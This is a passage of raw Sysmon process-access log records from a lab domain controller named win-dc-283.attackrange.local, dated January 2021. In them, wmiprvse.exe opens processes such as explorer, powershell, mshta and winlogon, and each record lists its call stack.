15:59:34.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025976Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5364-6008-6106-00000000A301}6220C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025975Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5364-6008-6006-00000000A301}6448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025974Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5364-6008-5F06-00000000A301}6532C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025973Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025972Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025971Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025970Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025969Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025968Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025967Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025966Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025965Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025964Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025963Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025962Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025961Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025960Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025959Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025958Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.132{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025957Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program 